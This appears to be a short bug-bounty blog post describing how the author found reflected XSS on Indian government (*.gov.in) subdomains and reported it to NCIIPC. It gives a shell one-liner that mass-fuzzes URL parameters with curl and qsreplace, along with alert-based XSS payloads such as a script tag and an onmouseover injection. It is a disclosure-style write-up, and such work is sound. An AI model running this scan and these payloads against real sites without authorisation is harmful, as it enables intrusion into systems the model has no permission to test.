How I found Reflected XSS on *.GOV.IN

Prince Prafull
3 min readMay 2, 2023

--

This blog will help you find all the vulnerable parameters in any web application. It will also teach you how to exploit vulnerabilities like XSS and SQLI by approaching any website.

What is Reflected XSS:

Reflected cross-site scripting (or XSS) is a security vulnerability that occurs when an application receives data in an HTTP request and stores it within the response without properly filtering and sanitizing it.

Lets move step by step:

Select the domain: *.gov.in

Step 1: Find all possible subdomain under selected domain

Step 2: Select any one subdomain

Step 3: Find out all possible parameters using tool like Paramspider

Step 4: Examine all urls that are directly reflecting special characters.

To automate, use below script:

cat urls.txt| egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()'| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && echo -e "$host \033[91m Vullnerable \e[0m \n" || echo -e "$host  \033[92m Not Vulnerable \e[0m \n"; done | tee XSS.txt

The script shows these parameters as Vulnerable:

Step 5: Try it Manually now:

Lets try will basic XSS payload:

"><script>alert(1);</script>

Doesn’t work:

Enter Payload

No Pop-Ups:

Lets Start from the beginning:

Just try with: single quote

'
No Errors

No input validation or Sanitization is present:

Now Try with some events:

' onmouseover=alert(1);>

Hover your mouse over the links after entering the payload to have it executed.

Lets see source code:

We got XSS, Now report to NCIIPC

📞Contact:

https://www.linkedin.com/in/prince-prafull-19a477194/

--

--

Prince Prafull

Cyber Security Learner | Web Application Testing | Student